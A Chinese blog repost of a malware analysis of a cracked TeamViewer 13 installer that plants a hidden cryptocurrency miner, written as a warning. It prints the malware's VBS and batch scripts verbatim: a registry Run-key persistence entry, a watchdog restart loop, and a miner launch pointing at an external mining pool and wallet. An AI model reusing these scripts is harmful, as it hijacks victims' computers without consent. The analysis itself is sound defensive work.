同学!你下载的TeamViewer13破解版可能有毒

yx 2018-08-1319:07:42同学!你下载的TeamViewer13破解版可能有毒已关闭评论84.3K1阅读6分9秒

首先声明:本篇文章来自于reebuf作者si1ence。为什么搬运?因为此款远程软件涉及用户较多,希望让更多人看到。

原文内容

0×0 故事背景最近有个远程管理一下某内网服(tiao)务(ban)器(ji)的需求,映射到公网又不安全毕竟黑帽子这么多,思来想去之后还是觉得老老实实装个Teamviewer最靠谱,度娘一下发现还真的不少破解版资源可以下载,于是随意下载一个破解版准备开始操作。
0×1 安装过程 先看一下文件描述信息也没有发现什么问题,就开始下一步安装了。
同学!你下载的TeamViewer13破解版可能有毒
安装完成了功能正常,一切OK,渐渐的电脑开始卡到爆,敏感的有一种不好的预感。
同学!你下载的TeamViewer13破解版可能有毒
0×2 问题排查开始仔细的检查一下进程列表在最后发现了一个奇怪的进程,居然被植入了挖矿病毒这个也太明显了吧,也不搞点进程注入无文件攻击之类的高端技术,系统盘下面也多了不少.bat与.vbs文件
同学!你下载的TeamViewer13破解版可能有毒
直接结束了挖矿的进程之后又自动起来了,还是看看这些同伴里面到底写了什么玩意。
同学!你下载的TeamViewer13破解版可能有毒
[v_blue]0.Servicecrsssr.vbs: im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "%windir%\winvprse.bat", 0Set WShell = Nothing[/v_blue]
1.Winprs.bat:
[v_blue]@Echo OffREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run /v "Chrome" /f /t REG_SZ /d "%windir%\servicecrsssr.vbs"Exit[/v_blue]
2.Winvpr.vbs:

im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "winprs.bat", 0Set WShell = Nothing

3.Winvprse.bat:

@echo offSETLOCAL EnableExtensions:starttimeout /t 160 /nobreak > NULecho offtasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="0" goto starttasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="1" goto processnotrunning:processnotrunningstart "" "%windir%\xdgaudio.vbs"goto startexit

4.xdgaudio.vbs

Dim WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "wmipvrse.exe --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://krb.crypto-coins.club:5555 -u KjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ -p x", 0Set WShell = Nothing

5.Wmipvrse.exe 矿池与钱包都这么出来了,看看到底挖了多少钱。
同学!你下载的TeamViewer13破解版可能有毒
同学!你下载的TeamViewer13破解版可能有毒
0×3 逆向分析 对Wmipvrse.exe这个进程里面的东西还是感到好奇,决定还是看一看,已经加壳了不过还好是UPX的标准壳可直接脱。
CPU-miner github上面的开源代码
同学!你下载的TeamViewer13破解版可能有毒
同学!你下载的TeamViewer13破解版可能有毒
同学!你下载的TeamViewer13破解版可能有毒
0×4 病毒清理 事到如此根据几个vbs与bat文件的内容,运行原理还是比较清楚了,就动手清理了。
[v_blue]Step1:使用PCHunter删除6个病毒母体
servicecrsssr.vbs
Winprs.bat
Winvpr.vbs
Winvprse.bat
Wmipvrse.exe
xdgaudio.vbsStep[/v_blue]
2:清除注册表
同学!你下载的TeamViewer13破解版可能有毒
0×5 总结
1.下载软件尽量选择官方平台或者可信的第三方软件平台。2.天下没有白吃的午餐,破解版软件里面可能含有一些让你惊喜的病毒木马后门,也许是一个大礼包呢。3.安全无小事,日常需注意。

继续阅读
世界唯一不变的就是变化,世界唯一可能的就是不可能。
易语言DLL公开程序中无法自定义数据类型解决办法 技术分享

易语言DLL公开程序中无法自定义数据类型解决办法

在编写动态链接库时发现无法公开自定义数据库,只能提供基本数据库且不包含字节集。   其报错为 错误(10063): 被取地址的子程序“Entrance”的参数 2 必须是基本数据类型,且不能...
WindowsAPI易语言内介绍和使用 技术分享

WindowsAPI易语言内介绍和使用

引用百度百科介绍:Windows 这个多作业系统除了协调应用程序的执行、分配内存、管理资源之外, 它同时也是一个很大的服务中心,调用这个服务中心的各种服务(每一种服务就是一个函数),可以帮应用程式达到...
了解和掌握易语言面向对象 技术分享

了解和掌握易语言面向对象

许久许久,忙于工作和结婚无法更新一些实用的技术文章,趁女神节有点业余时间写下这篇“面向对象”技术分享文章 前言  希望你在看完这篇文章后能够了解 面向对象的含义,了解什么是面向对象 知道什么是类,了解...
百度统计/SSP等新建或验证网站失败解决办法 技术分享

百度统计/SSP等新建或验证网站失败解决办法

在这里我必须吐槽一下百度了,竟然不支持HTTPS验证 看到引用了吗? 获取验证文件失败或文件错误,请您确认正确放置后,再次点击“完成验证”按钮” 你没有看错,因为百度不支持HTTPS验证,你需要关掉H...